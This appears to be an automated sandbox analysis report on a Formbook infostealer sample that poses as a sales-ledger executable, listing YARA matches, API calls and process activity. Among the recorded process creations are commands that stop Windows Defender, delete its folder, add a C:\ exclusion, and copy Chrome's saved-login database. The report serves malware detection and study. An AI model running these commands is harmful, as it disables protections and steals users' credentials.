Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375859659.000000000147F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378517009.0000000001659000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs Require your Sales Ledger from 01-April-2020.exe
Source: Require your Sales Ledger from 01-April-2020.exe	Binary or memory string: OriginalFilenameBogxyjdq.exeH vs Require your Sales Ledger from 01-April-2020.exe

Source: Require your Sales Ledger from 01-April-2020.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Require your Sales Ledger from 01-April-2020.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/14@2/1

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 9_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 13_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_01

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Jump to behavior

Source: Require your Sales Ledger from 01-April-2020.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Require your Sales Ledger from 01-April-2020.exe

ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

File read: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe 'C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe'
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Windows\SysWOW64\cmmon32.exe

File written: C:\Users\user\AppData\Roaming\28L0N9-0\28Llogri.ini

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\cmmon32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Require your Sales Ledger from 01-April-2020.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Require your Sales Ledger from 01-April-2020.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source:	Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source:	Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Require your Sales Ledger from 01-April-2020.exe, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: Require your Sales Ledger from 01-April-2020.exe.0.dr, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, u0002u2000.cs	.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: Require your Sales Ledger from 01-April-2020.exe, type: SAMPLE
Source: Yara match	File source: 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.372679225.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.205785020.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.313035991.0000000000502000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.311765187.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.309575411.00000000072A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 6300, type: MEMORY
Source: Yara match	File source: Process Memory Space: Require your Sales Ledger from 01-April-2020.exe PID: 5792, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, type: DROPPED
Source: Yara match	File source: 0.0.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.Require your Sales Ledger from 01-April-2020.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Require your Sales Ledger from 01-April-2020.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.710000.1.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_0057A5EC push es; ret
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_04E27191 push ecx; ret
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Code function: 0_2_04E21B58 push esp; retf
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 9_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 9_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 9_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 13_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 13_2_0040B550 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Code function: 13_2_0040B50D push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041C023 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D0F2 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D0FB push eax; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D0A5 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041D15C push eax; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_00416A81 pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0040B28C pushad ; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0041CFA2 push edx; iretd
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0078A5EC push es; ret
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0124D0D1 push ecx; ret
Source: C:\Windows\explorer.exe	Code function: 25_2_061CB947 pushfd ; retf
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_04D1D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B1B28C pushad ; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2DA2D push cs; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2D0A5 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2D0F2 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2D0FB push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2C023 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2D9C9 push ecx; retf
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2D15C push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 32_2_02B2CFA2 push edx; iretd

Source: initial sample	Static PE information: section name: .text entropy: 7.9825675946
Source: initial sample	Static PE information: section name: .text entropy: 7.9825675946

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: \require your sales ledger from 01-april-2020.exe

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	File created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE

Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe

Code function: 9_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe	Process information set: NOOPENFILEERRORBOX
